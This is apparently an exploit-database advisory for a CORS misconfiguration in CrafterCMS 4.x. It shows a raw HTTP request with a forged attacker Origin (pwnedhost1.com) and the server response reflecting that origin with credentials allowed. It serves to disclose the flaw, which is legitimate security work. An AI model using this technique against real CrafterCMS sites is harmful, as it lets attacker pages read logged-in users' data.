## Exploit Title: craftercms 4.x.x - CORS ## Author: nu11secur1ty ## Date: 03.07.2023 ## Vendor: https://docs.craftercms.org/en/4.0/index.html# ## Software: https://github.com/craftercms/craftercms/tags => 4.x.x ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin pwnedhost1.com which domain is on the attacker. The application allows two-way interaction from the pwnedhost1.com origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe. The attacker can use some library of the victim and this can be very dangerous! STATUS: HIGH Vulnerability [+]Exploit: [-]REQUEST... ```GET GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1 Host: 192.168.100.87:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f; JSESSIONID=4730F0ED2120D31A17574CE997325DA8 Referer: http://192.168.100.87:8080/studio/login x-requested-with: XMLHttpRequest Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Origin: http://pwnedhost1.com/ ``` [-]RESPONSE: ``` HTTP/1.1 200 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Access-Control-Allow-Origin: http://pwnedhost1.com/ Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Type: application/json;charset=UTF-8 Content-Language: en-US Date: Tue, 07 Mar 2023 11:00:19 GMT Connection: close Content-Length: 124 [{"id":"en","label":"English"},{"id":"es","label":"Espa..ol"},{"id":"kr","label":"........."},{"id":"de","label":"Deutsch"}] ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0) ## Proof and Exploit: [href](https://streamable.com/jd1x8j) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty